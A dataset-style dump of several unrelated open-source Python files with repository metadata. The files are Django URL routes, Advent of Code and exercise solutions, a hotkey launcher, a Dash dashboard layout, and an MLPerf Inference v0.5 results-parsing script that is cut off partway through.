ArticleListView.as_view(), name='articles-page'),\r\n\tpath('article/create/', login_required(CreateArticleView.as_view(), login_url='login-page'), name='create-article'),\r\n\r\n\tpath('article/update/<int:id>', login_required(UpdateArticleView.as_view(), login_url='login-page'), name='update-article'),\r\n\r\n\tpath('article/delete/<int:id>', login_required(DeleteArticleView.as_view(), login_url='login-page'), name='delete-article'),\r\n\r\n\tpath('article/delete-comment/<int:id>', deleteComment, name='delete-comment'),\r\n\r\n\r\n]","repo_name":"ShoyaAlm/Articles4All-Django-Website","sub_path":"articlesforall/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31068509882","text":"# This file is part of aoc2016.\n#\n# aoc2016 is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# aoc2016 is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with aoc2016. If not, see <http://www.gnu.org/licenses/>.\ndef part_one(puzzle_input):\n n_triangles = 0\n for line in puzzle_input.split('\\n'):\n a, b, c = decompose_line(line)\n if is_triangle(a, b, c):\n n_triangles += 1\n\n return str(n_triangles)\n\n\ndef part_two(puzzle_input):\n n_triangles = 0\n input_lines = puzzle_input.split('\\n')\n for line_group in zip(input_lines[::3], input_lines[1::3], input_lines[2::3],):\n line_group = [decompose_line(line) for line in line_group]\n for i in range(3):\n sides = [line[i] for line in line_group]\n if is_triangle(*sides):\n n_triangles += 1\n\n return str(n_triangles)\n\n\ndef is_triangle(a, b, c):\n a, b, c = sorted((a, b, c))\n return a + b > c\n\n\ndef decompose_line(line):\n return list(map(int, line.strip().split()))\n","repo_name":"T-R0D/JustForFun","sub_path":"aoc2016/aoc2016/day03/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"74777753593","text":"#decided against recursion as it would use more memory than the loop\n#due too having to pass the variables to the function. Rather than just use\n#them immediately.\n\ndef reverseSentence(splitSentence, reversedString, i): #(1)\n '''Takes input of a list of strings. An empty string and an integer which is\n the length of the list. Reverses this list. Returns a concatenated string.'''\n ##from the end of the list to the beginning. Add the item at position i in the\n #list to the new string.\n while i >=0: #(n)\n reversedString = reversedString + splitSentence[i] + \" \" #(n)\n i = i -1 #(n)\n return reversedString #(1)\ninputSentence= input(\"Please input a sentence you would like reversed\") #(1)\n\n\nsplitSentence = inputSentence.split() #(n)\n\n\nreversedString = \"\" #(1)\n\n#finds the amount of words in the list. Takes away one as the list\n#is indexed from 0 so that loop therefore doesn't begin outside of list.\ni = len(splitSentence) -1 #(1)\n\n\nprint(reverseSentence(splitSentence, reversedString, i)) #(1)\n\n#run time: 4n+7\n#big O: O(n)\n\n","repo_name":"Gc0066/210CT-Coursework","sub_path":"Lab Sheet 3/Question 1 (6).py","file_name":"Question 1 (6).py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25693976045","text":"import logging as log\nimport json\nimport shlex\nfrom typing import Union\nfrom pathlib import Path\nfrom functools import partial\nfrom subprocess import Popen\nfrom pynput import keyboard\nimport click\nfrom voluptuous import MultipleInvalid\n\n# Local module imports\nfrom runslick.validation import CONFIG_SCHEMA\nfrom runslick.hotkey import HotKeyManager\nfrom runslick.prompt import PromptManager\nfrom runslick.incantation import Incantation\n\n# Global logging configuration\nLOG_LEVEL = {'CRITICAL': log.CRITICAL, 'ERROR': log.ERROR, 'WARNING': log.WARNING, 'INFO': log.INFO,\n 'DEBUG': log.DEBUG, 'NOTSET': log.NOTSET}\nlog.basicConfig(format='%(levelname)s - %(module)s.%(funcName)s - [%(asctime)s]: %(message)s')\n\n\ndef configure_logging(log_level: str):\n log.getLogger().setLevel(LOG_LEVEL[log_level])\n\n\ndef load_configuration(config_path: Path):\n log.info(\"Loading configuration: %s\", str(config_path))\n config_data = json.load(config_path.open('r'))\n CONFIG_SCHEMA(config_data)\n log.info(\"Configuration loaded.\")\n return config_data\n\n\ndef load_configuration_or_die(config_path: Path):\n \"\"\"Loads configuration and validates it or exits the application.\"\"\"\n try:\n return load_configuration(config_path)\n except MultipleInvalid as exc:\n log.critical(\"Configuration (%s) parsing error: %s\", str(config_path), str(exc))\n exit(2)\n except json.JSONDecodeError as exc:\n log.critical(\"JSON parsing error when trying to read configuration: %s\", str(config_path))\n exit(2)\n\n\ndef prompt(prompt_manager: PromptManager):\n log.debug(\"Main prompt invoked\")\n result = prompt_manager.run_prompt(\"Run:\")\n log.info(\"User prompt result: %s\", result)\n\n\ndef execute(incantation: Incantation, exec_cmd, prompt_manager=None):\n log.info(\"Executing: %s\", incantation)\n cmd = incantation.concretize(prompt_manager)\n if cmd:\n cmd = shlex.split(exec_cmd) + [cmd]\n log.info(\"Executing: %s\", str(cmd))\n Popen(cmd)\n else:\n log.error(\"Could not concretize incantation: %s\", incantation)\n\n\n@click.command()\n@click.option('--config-file', '-c', type=click.Path(exists=True, file_okay=True, dir_okay=False,\n writable=False, readable=True,\n resolve_path=True, allow_dash=True),\n default=str(Path.cwd() / 'config.json'), help=\"JSON-formatted configuration file, \"\n \"defaults to config.json in the current\"\n \" directory\")\n@click.option('--debug/--no-debug', default=False)\ndef main(config_file: Union[Path, str], debug: bool):\n '''A highly configurable hotkey launcher for programs based on slickrun but for Linux/Mac'''\n config_file = Path(config_file)\n if debug:\n configure_logging('DEBUG')\n log.debug(\"Logging level set to debug\")\n config = load_configuration_or_die(config_file)\n terminal_cmd = config['service']['terminal']\n open_cmd = config['service']['open']\n\n log.debug(\"Initializing hotkey and prompt managers...\")\n hkm = HotKeyManager()\n prompt_manager = PromptManager()\n # register primary hotkey to prompt for magic word\n hkm.register(config['service']['hotkey'], partial(prompt, prompt_manager))\n # register magic words as hotkeys and prompt-commands\n for magic_word, info in config[\"magic_words\"].items():\n log.debug(magic_word, info)\n if 'terminal' in info and info['terminal'] is True:\n prompt_manager.register_action(magic_word, partial(execute,\n Incantation(magic_word,\n info['incantation']),\n terminal_cmd,\n prompt_manager=prompt_manager))\n if 'hotkey' in info:\n hkm.register(info['hotkey'], partial(execute,\n Incantation(magic_word,\n info['incantation']),\n terminal_cmd,\n prompt_manager=prompt_manager))\n else:\n prompt_manager.register_action(magic_word, partial(execute,\n Incantation(magic_word,\n info['incantation']),\n open_cmd,\n prompt_manager=prompt_manager))\n if 'hotkey' in info:\n hkm.register(info['hotkey'], partial(execute,\n Incantation(magic_word,\n info['incantation']),\n open_cmd,\n prompt_manager=prompt_manager))\n log.debug(\"Hotkey manager initialized, listening for shortcuts...\")\n # Collect events until released\n with keyboard.Listener(on_press=hkm.on_press, on_release=hkm.on_release) as listener:\n listener.join()\n","repo_name":"Abraxos/runslick","sub_path":"runslick/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"37037461248","text":"import dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom datetime import datetime, timedelta\nimport math\n\n\nnow = datetime.now()\nyear = now.year\nnow_minus_90 = now - timedelta(90)\nprevious_quarter = f'{now.year}-Q{math.ceil(now_minus_90.month/3)}'\nthis_quarter = f'{now.year}-Q{math.ceil(now.month/3)}'\n\n\ntime_periods = [\n f'{year - 1}-Annual',\n f'{year}-Q1',\n f'{year}-Q2',\n f'{year}-Half-Yearly',\n f'{year}-Q3',\n f'{year}-Q4',\n f'{year}-Annual'\n]\n\nperiod_dict = {\n f'{year - 1}-Annual': (f'01-01-{year-1}', f'12-31-{year-1}'),\n f'{year}-Q1': (f'01-01-{year}', f'03-31-{year}'),\n f'{year}-Q2': (f'04-01-{year}', f'06-30-{year}'),\n f'{year}-Q3': (f'07-01-{year}', f'09-30-{year}'),\n f'{year}-Q4': (f'10-01-{year}', f'12-31-{year}'),\n f'{year}-Half-Yearly': (f'01-01-{year}', f'06-30-{year}'),\n f'{year}-Annual': (f'01-01-{year}', f'12-31-{year}')\n}\n\n\ndef create_danger_alert(message, dismissable=False):\n return dbc.Alert(message, color=\"danger\", dismissable=dismissable)\n\n\nalert = dbc.Alert(\"No metrics data XLSX. Please contact EQA Support\",\n color=\"danger\",\n dismissable=False)\n\n\nselect_quarter = dbc.FormGroup(\n [\n dbc.Label(\"Select Timeperiod\"),\n dcc.Dropdown(\n id=\"quarter-selector\",\n options=[\n {\"label\": t, \"value\": t}\n for t in time_periods\n ],\n value=this_quarter,\n ),\n ]\n)\n\n\nselect_dropdown_card = dbc.Card(\n [\n dbc.CardBody(\n [\n html.Div(id=\"the_alert\", children=[],\n style={\n 'margin-bottom': '10px'\n }),\n select_quarter,\n html.Hr(),\n ]\n ),\n ],\n color=\"light\",\n)\n\nlayout = dbc.Container(\n [\n html.H1(\"EQA Automation-Team Dashboard\",\n style={\n 'textAlign': 'center',\n 'color': '#ad5555'\n }),\n html.Hr(),\n\n dbc.Row(\n [\n dbc.Col(select_dropdown_card, md=6,\n width={\"size\": 6, \"offset\": 3})\n ],\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"list_of_projects\"), md=12),\n ]\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"all_proj_hours\"), md=12),\n ]\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"type_pie\"), md=6),\n dbc.Col(dcc.Graph(id=\"num_proj_bar\"), md=6),\n ]\n ),\n html.Hr(),\n html.H2(\"Number Of Scripts Developed\",\n style={\n 'textAlign': 'center',\n 'color': '#ad5555'\n }),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"num_of_scripts\"), md=12),\n ]\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"script_count_table\"), md=6)\n ],\n justify=\"center\",\n ),\n ],\n fluid=True,\n)\n","repo_name":"sridharaiyer/eqa-dash","sub_path":"layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7601302407","text":"T = int(input())\nfor tc in range(T):\n n, m = map(int, input().split()) # 문서의 개수, 궁금한 문서 idx\n file = list(map(int, input().split()))\n\n q = [] # 문서의 idx 값이 나중에 필요하므로 idx와 같이 저장\n for i in range(n):\n q.append([file[i], i])\n\n v = [0] * n # 몇 번째로 빠졌는지 기록할 list\n\n cnt = 0\n while q:\n a = q.pop(0)\n cnt += 1 # 몇 번째로 뺐는지 확인하고 넣어줌\n v[a[1]] = cnt\n\n for i in range(len(q)):\n if q[i][0] > a[0]: # 우선순위가 큰 게 있다면 뒤로 붙이고 cnt 다시 원위치\n q.append(a)\n cnt -= 1\n v[a[1]] = 0\n break\n\n print(v[m])","repo_name":"zoyul/algorithm","sub_path":"baekjoon/1966_프린터큐.py","file_name":"1966_프린터큐.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2855690428","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # [MLPerf Inference Results v0.5](https://github.com/mlperf/inference/tree/master/v0.5)\n# ## Automatic results table generation (c) [dividiti](http://dividiti.com/)\n\n# ## Includes\n\n# In[ ]:\n\n\nimport os\nimport re\nimport json\nfrom pprint import pprint\n\n\n# In[ ]:\n\n\nimport IPython as ip\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mp\n# import seaborn as sb\n\n\n# In[ ]:\n\n\nprint ('IPython version: %s' % ip.__version__)\nprint ('Pandas version: %s' % pd.__version__)\nprint ('NumPy version: %s' % np.__version__)\nprint ('Matplotlib version: %s' % mp.__version__)\n# print ('Seaborn version: %s' % sb.__version__)\n\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ndefault_dpi = 300\ndefault_fontsize = 12\nmp.rcParams['figure.dpi'] = default_dpi\nmp.rcParams['font.size'] = default_fontsize\n\n\n# In[ ]:\n\n\nfrom IPython.display import Image, display\ndef display_in_full(df):\n pd.options.display.max_columns = len(df.columns)\n pd.options.display.max_rows = len(df.index)\n display(df)\n\n\n# ## Definitions\n\n# ### Path to the repository with results\n\n# In[ ]:\n\n\n# Clone the results directory:\n# git clone https://github.com/mlperf/inference_results_v0.5 <results_path>\n# or\n# git clone https://github.com/dividiti/inference_results_v0.5 <results_path>\n# results_path = '/home/anton/projects/mlperf/inference_results_v0.5_dividiti'\nresults_path = '/home/anton/projects/mlperf/inference_results_v0.5_plus'\n\n\n# ### Path to the cache\n\n# In[ ]:\n\n\ncache_name = 'mlperf-inference-v0.5-results.zip'\ncache_compression = 'zip'\ncache_protocol = 2 # Supported since Python 2.3\n\nimport ck.kernel as ck\nrepo_uoa = 'ck-mlperf'\nmodule_uoa = 'module'\ndata_uoa = 'mlperf.inference'\nr = ck.access({'action':'find', 'repo_uoa':repo_uoa, 'module_uoa':module_uoa, 'data_uoa':data_uoa})\nif r['return']>0:\n print('Error: %s' % r['error'])\n exit(1)\ncache_path = os.path.join(r['path'], cache_name)\ncache_path\n\n\n# ### Divisions\n\n# In[ ]:\n\n\ndivisions = [ 'closed', 'open' ]\n\n\n# ### Maps for DataFrame construction\n\n# In[ ]:\n\n\n# Lowercase or camelcase or camelcase with space to camelcase.\nscenario_to_str = {\n # SingleStream.\n 'singlestream' : 'SingleStream',\n 'SingleStream' : 'SingleStream',\n 'Single Stream' : 'SingleStream',\n # MultiStream.\n 'multistream' : 'MultiStream',\n 'MultiStream' : 'MultiStream',\n 'Multi Stream' : 'MultiStream',\n # Server.\n 'server' : 'Server',\n 'Server' : 'Server',\n # Offline.\n 'offline' : 'Offline',\n 'Offline' : 'Offline',\n}\n\n\n# In[ ]:\n\n\ndivision_to_str = {\n # Open.\n 'open' : 'Open',\n 'Open' : 'Open',\n # Closed.\n 'closed' : 'Closed',\n 'Closed' : 'Closed'\n}\n\n\n# In[ ]:\n\n\n# dividiti-specific.\nsystem_id_to_processor = {\n 'firefly' : 'Rockchip RK3399',\n 'hikey960' : 'HiSilicon Kirin960',\n 'mate10pro' : 'HiSilicon Kirin970',\n 'rpi4' : 'Broadcom BCM2711B0',\n}\n\n\n# In[ ]:\n\n\naccelerator_name_to_accelerator = {\n 'NVIDIA Tesla T4': 'NVIDIA Tesla T4',\n 'Nvidia Tesla T4': 'NVIDIA Tesla T4',\n 'Tesla T4': 'NVIDIA Tesla T4',\n 'Nvidia Tesla V100 SXM3': 'NVIDIA Tesla V100 SXM3',\n 'tpu-v3.8': 'Google TPU v3-8', # NB: 8 TPU v3?\n 'HanGuang 800': 'Alibaba HanGuang 800',\n 'Goya': 'Habana Goya',\n}\n\n\n# ### Metrics for DataFrame construction\n\n# In[ ]:\n\n\n# Performance metrics: Stream in ms; MultiStream in #streams; Server in QPS; Offline in inputs/s).\nperformance_columns = [\n 'P_{}_{}'.format(task, scenario)\n for task in ['IC1','IC2','OD1','OD2','NMT'] \n for scenario in ['SS','MS','S','O']\n]\n# Accuracy metrics: Image Classification in Top1, %; Object Detection in mAP, %; Machine Translation in BLUE.\naccuracy_columns = [\n 'A_{}_{}'.format(task, scenario)\n for task in ['IC1','IC2','OD1','OD2','NMT']\n for scenario in ['SS','MS','S','O']\n]\n# Score columns.\nscore_columns = performance_columns + accuracy_columns\n\n\n# ### Non-imagenet benchmarks\n\n# In[ ]:\n\n\nnon_imagenet_benchmarks = {\n # Non-ImageNet benchmarks from the closed division.\n 'ssd-small': {\n \"name\" : \"SSD-MobileNet-v1\",\n \"width\" : 300,\n \"height\": 300,\n },\n 'ssd-large': {\n \"name\" : \"SSD-ResNet34\",\n \"width\" : 1200,\n \"height\": 1200,\n },\n 'gnmt' : {\n \"name\" : \"GNMT\",\n \"width\" : -1,\n \"height\": -1,\n },\n # Non-ImageNet benchmarks from the open division.\n 'rcnn-nas-lowproposals' : {\n \"name\" : \"Faster-RCNN-NAS lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_nas_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1200,\n \"height\" : 1200,\n },\n 'rcnn-resnet50-lowproposals' : {\n \"name\" : \"Faster-RCNN-ResNet50 lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet50_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'rcnn-resnet101-lowproposals' : {\n \"name\" : \"Faster-RCNN-ResNet101 lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet101_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'rcnn-inception-resnet-v2-lowproposals' : {\n \"name\" : \"Faster-RCNN-Inception-ResNet-v2 lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_resnet_v2_atrous_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'rcnn-inception-v2' : {\n \"name\" : \"Faster-RCNN Inception-v2\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_v2_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'ssd-inception-v2' : {\n \"name\" : \"SSD-Inception-v2\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssd_inception_v2_coco_2018_01_28.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n },\n 'ssd-mobilenet-v1-quantized-mlperf' : {\n \"name\" : \"SSD-MobileNet-v1\",\n \"url\" : \"https://zenodo.org/record/3361502/files/ssd_mobilenet_v1_coco_2018_01_28.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n \"provenance\" : \"Google\",\n },\n 'ssd-mobilenet-v1-non-quantized-mlperf' : {\n \"name\" : \"SSD-MobileNet-v1 quantized\",\n \"url\" : \"https://zenodo.org/record/3252084/files/mobilenet_v1_ssd_8bit_finetuned.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n \"provenance\" : \"Habana\"\n },\n 'ssd-mobilenet-v1-fpn' : {\n \"name\" : \"SSD-MobileNet-v1 FPN SBP\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz\",\n \"width\" : 640,\n \"height\" : 640,\n },\n 'ssd-resnet50-fpn' : {\n \"name\" : \"SSD-ResNet50-v1 FPN SBP\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz\",\n \"width\" : 640,\n \"height\" : 640,\n },\n 'ssdlite-mobilenet-v2' : {\n \"name\" : \"SSDLite-MobileNet-v2\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n },\n 'yolo-v3' : {\n \"name\" : \"YOLO-v3\",\n \"url\" : \"https://zenodo.org/record/3386327/files/yolo_v3_coco.tar.gz\",\n \"width\" : 416,\n \"height\" : 416,\n \"provenance\" : \"https://github.com/YunYang1994/tensorflow-yolov3/\"\n }\n}\n\n\n# ## Code\n\n# In[ ]:\n\n\n# We use two modes: the 'spreadsheet' mode tries to mimic the official submission table as much as possible;\n# the 'dashboard' mode uses a more appropriate layout for the CK dashboard.\ndef get_data(results_path=results_path, mode='spreadsheet'):\n dfs = []\n # FOR EACH division.\n for division in divisions:\n #if division == 'open': continue # skip\n # FOR EACH submitter.\n submitters_dir = os.path.join(results_path, division)\n submitters = [ fn for fn in os.listdir(submitters_dir) if os.path.isdir(os.path.join(submitters_dir, fn)) ]\n for submitter in submitters:\n # Selectively filter out submitters.\n #all_submitters_closed = [ 'Alibaba', 'CentaurTechnology', 'DellEMC', 'dividiti', 'FuriosaAI', 'Google', 'Habana', 'Hailo', 'Intel', 'NVIDIA', 'Qualcomm', 'Tencent' ]\n #if division == 'closed' and submitter not in all_submitters_closed: continue\n #all_submitters_open = [ 'dividiti', 'Habana', 'Inspur', 'NVIDIA', 'Qualcomm' ]\n #if division == 'open' and submitter not in all_submitters_open: continue\n # FOR EACH system.\n results_dir = os.path.join(submitters_dir, submitter, 'results')\n systems = [ fn for fn in os.listdir(results_dir) if os.path.isdir(os.path.join(results_dir, fn)) ]\n for system in systems:\n system_dir = os.path.join(results_dir, system)\n system_json_name = system + '.json'\n system_json_path = os.path.join(submitters_dir, submitter, 'systems', system_json_name)\n with open(system_json_path) as system_json_file:\n system_json = json.load(system_json_file)\n\n # Category.\n if system_json['status'] in [ 'available', 'Available' ]:\n category = 'Available'\n elif system_json['status'] in [ 'preview', 'Preview' ]:\n category = 'Preview'\n elif system_json['status'] in [ 'rdi', 'RDI', 'rdo', 'RDO' ]:\n category = 'Research, Development, Other'\n elif system_json['status'] in [ 'Unofficial', 'unofficial' ]:\n category = 'Unofficial'\n else:\n raise Exception(\"Unsupported category '%s'!\" % (system_json['status']))\n\n # System details.\n system_name = system_json['system_name']\n system_list = system.split('-')\n system_id = system_list[0] \n\n # Processor (CPU).\n processor = system_id_to_processor.get(system_id, system_json.get('host_processor_model_name', 'N/A'))\n processor_num = int(system_json.get('host_processors_per_node', 0))\n\n # Accelerator.\n # Tencent: https://github.com/mlperf/submissions_inference_0_5/issues/285\n accelerator_name = system_json.get('accelerator_model_name', 'N/A')\n accelerator_num = int(system_json.get('accelerators_per_node', 0))\n accelerator = accelerator_name_to_accelerator.get(accelerator_name, accelerator_name)\n\n # Software (framework).\n software = system_json['framework']\n\n # Default form factors and notes.\n # NB: Using space rather than empty string turns out better for dashboard.\n ff_m = ff_d = ff_s = ff_e = ' '\n notes = ' '\n\n # Submitter-specific form factors and notes.\n submitter_str = submitter\n if submitter == 'dividiti':\n # Form factors.\n if system_id in [ 'hikey960', 'firefly', 'rpi4' ]: ff_e = 'x'\n if system_id in [ 'mate10pro', 'hikey960' ]: ff_m = 'x'\n if system_id in [ 'velociti' ]: ff_d = 'x'\n # Notes.\n if system_id == 'hikey960':\n notes = 'Mobile chip in embedded form factor (development board).'\n if division == 'open':\n # Object Detection is collaboration between dividiti and Politecnico di Milano.\n if system_id == 'velociti': submitter_str = 'dividiti + PoliMi'\n if system == 'velociti-tensorflow-v1.14-cpu':\n notes = 'In the Other category, since this Intel CPU is no longer available (end-of-life).'\n elif submitter == 'Alibaba':\n ff_s = 'x'\n if system_id == 'alibaba_cloud_t4':\n notes = 'ECC off'\n elif submitter == 'DellEMC':\n ff_s = 'x'\n if system_id == 'R740_T4x4_tensorrt':\n notes = 'ECC off'\n elif submitter == 'Google':\n ff_s = 'x'\n system_name = '{:d}x Cloud {:s}'.format(int(accelerator_num/8), accelerator)\n elif submitter == 'Habana':\n ff_d = ff_s = ff_e = 'x'\n if division == 'open':\n if system_id == 'Goya_fast_latency':\n notes = 'Low latency results ...'\n if system_id == 'Goya_med_latency':\n notes = 'Medium latency results ...' \n elif submitter == 'Intel':\n if system_id == 'ICL':\n ff_m = 'x'\n else:\n ff_s = 'x'\n elif submitter == 'NVIDIA':\n if system_id == 'Xavier':\n ff_e = 'x'\n if division == 'closed':\n notes = 'GPU and both DLAs are used in Offline and MultiStream'\n elif system_id == 'TitanRTXx4':\n ff_e = ff_s = ff_d = 'x'\n elif system_id == 'T4x8':\n ff_e = ff_s = 'x'\n elif system_id == 'T4x20':\n ff_s = 'x'\n else:\n raise Exception(\"Unsupported NVIDIA system '%s'!\" % system_id) \n elif submitter == 'Qualcomm':\n ff_m = 'x'\n if division == 'open':\n notes = 'Median latency. MultiStream: Both Hexagon Vector Extensions (HVX) and Hexagon Tensor Accelerator (HTA).'\n if division == 'closed':\n notes = 'Hexagon Vector Extensions being used.'\n elif submitter == 'Tencent':\n ff_s = 'x'\n # Preview only.\n elif submitter == 'CentaurTechnology':\n ff_d = ff_s = ff_e = 'x'\n elif submitter == 'Hailo':\n ff_d = ff_e = 'x'\n # RDO only.\n elif submitter == 'FuriosaAI':\n ff_d = ff_s = ff_e = 'x'\n # Open only.\n elif submitter == 'Inspur':\n ff_s = 'x'\n else:\n raise Exception(\"Unsupported division/submitter combination '%s'/'%s'!\" % (division, submitter))\n\n # Create DataFrame for each row of the final table based on the division, submitter and system.\n data = [{\n # \n 'ID' : '-', # TODO: Fill in later.\n 'Submitter' : submitter_str,\n 'System' : system_name,\n 'Benchmark' : '-', # TODO: Fill in later.\n # Processor.\n 'Processor' : processor,\n 'Processor #' : processor_num,\n # Accelerator.\n 'Accelerator' : accelerator,\n 'Accelerator #' : accelerator_num if accelerator_num != '0' else '',\n # Software.\n 'Software' : software,\n # Form factor.\n 'FF_M' : ff_m,\n 'FF_D' : ff_d,\n 'FF_S' : ff_s,\n 'FF_E' : ff_e,\n # Details. Code. Notes.\n 'Details' : 'https://github.com/mlperf/inference_results_v0.5/blob/master/{}/{}/systems/{}'. \\\n format(division, submitter, system_json_name),\n 'Code' : 'https://github.com/mlperf/inference_results_v0.5/tree/master/{}/{}/code'. \\\n format(division, submitter),\n 'Notes' : notes,\n # Misc.\n 'Division' : division_to_str.get(division, division),\n 'Category' : category,\n 'Task' : '-', # TODO: Fill in later.\n 'Scenario' : '-', # TODO: Fill in later.\n }]\n # NB: 'Accelerator #' is important to sort Google's submissions correctly (not lexicographically).\n index = [\n 'Division', 'Category', 'Submitter', 'Accelerator #', 'System', 'Software', 'Benchmark' #, 'Task', 'Scenario'\n ]\n # Reset all scores.\n if mode == 'spreadsheet':\n data[0].update({ score : '' for score in score_columns })\n\n # FOR EACH benchmark.\n benchmarks = [ fn for fn in os.listdir(system_dir) if os.path.isdir(os.path.join(system_dir, fn)) ]\n for (benchmark, benchmark_idx) in zip(benchmarks, range(len(benchmarks))):\n is_last_benchmark = (benchmark_idx == len(benchmarks) - 1)\n # Tencent and Inspur use resnet50.\n benchmark_name = 'resnet' if benchmark == 'resnet50' else benchmark\n # Benchmark (with notes).\n benchmark_dict = non_imagenet_benchmarks.get(benchmark_name)\n if benchmark_dict:\n width = benchmark_dict['width']\n height = benchmark_dict['height']\n else:\n if benchmark_name.endswith('96'):\n side = 96\n elif benchmark_name.endswith('128'):\n side = 128\n elif benchmark_name.endswith('160'):\n side = 160\n elif benchmark_name.endswith('192'):\n side = 192\n else:\n side = 224\n width = side\n height = side\n if width != -1 and height != -1:\n # Benchmark (width x height).\n benchmark_with_notes = '{} ({}x{})'.format(benchmark_name, width, height)\n else:\n # GNMT.\n benchmark_with_notes = benchmark_name\n # TODO: Rename to 'Model used, if not Closed Division default' for Open.\n data[0]['Benchmark'] = benchmark_with_notes\n\n # FOR EACH scenario.\n benchmark_dir = os.path.join(system_dir, benchmark)\n scenarios = [ fn for fn in os.listdir(benchmark_dir) if os.path.isdir(os.path.join(benchmark_dir, fn)) ]\n for scenario in scenarios:\n if mode != 'spreadsheet':\n data[0].update({ score : '' for score in score_columns })\n scenario_str = scenario_to_str.get(scenario,'')\n if scenario_str not in [ 'SingleStream', 'MultiStream', 'Server', 'Offline' ]: continue\n experiment_dir = os.path.join(benchmark_dir, scenario)\n # Extract accuracy.\n if submitter == 'Hailo' and benchmark == 'ssd-small':\n # https://github.com/mlperf/submissions_inference_0_5/issues/287\n task = 'OD'\n accuracy = 21.920 # ssd-small/SingleStream/accuracy/results.json\n else:\n accuracy_dir = os.path.join(experiment_dir, 'accuracy')\n with open(os.path.join(accuracy_dir, 'accuracy.txt'), 'r') as accuracy_file:\n accuracy_txt = accuracy_file.readlines()\n accuracy_line = accuracy_txt[-1]\n if accuracy_line.startswith('mAP'):\n task = 'OD'\n match = re.match('mAP\\=([\\d\\.]+)\\%', accuracy_line)\n accuracy = float(match.group(1))\n elif accuracy_line.startswith('accuracy'):\n task = 'IC'\n match = re.match('accuracy=(.+)%, good=(\\d+), total=(\\d+)', accuracy_line)\n accuracy = float(match.group(1))\n elif accuracy_line.startswith('BLEU'):\n task = 'MT'\n match = re.match('BLEU:\\s*(.+)', accuracy_line)\n accuracy = float(match.group(1))\n else:\n pprint(accuracy_txt)\n raise Exception('Failed to extract accuracy information from \"%s\"' % accuracy_line)\n data[0]['Task'] = { 'IC': 'Image Classification', 'OD': 'Object Detection', 'MT': 'Machine Translation' }.get(task)\n \n if scenario_str in [ 'SingleStream', 'MultiStream', 'Offline', 'Server' ]:\n data[0]['Scenario'] = scenario_to_str.get(scenario, scenario)\n if submitter == 'Tencent' and scenario_str in [ 'SingleStream', 'Offline' ]:\n # https://github.com/mlperf/submissions_inference_0_5/issues/286\n performance_dir = os.path.join(experiment_dir, 'performance')\n else:\n # TODO: Iterate over 5 runs for Server.\n performance_dir = os.path.join(experiment_dir, 'performance', 'run_1') \n with open(os.path.join(performance_dir, 'mlperf_log_summary.txt'), 'r') as summary_file:\n summary_txt = summary_file.readlines()\n for line in summary_txt:\n if re.match(\"Scenario\", line):\n # NB: LoadGen scenario strings have spaces between 'Single'/'Multi' and 'Stream'.\n loadgen_scenario = line.split(\": \",1)[1].strip()\n loadgen_scenario_str = scenario_to_str[loadgen_scenario]\n if loadgen_scenario_str != scenario_str:\n raise Exception(\"Expected '%s', parsed '%s'!\" % (scenario_str, 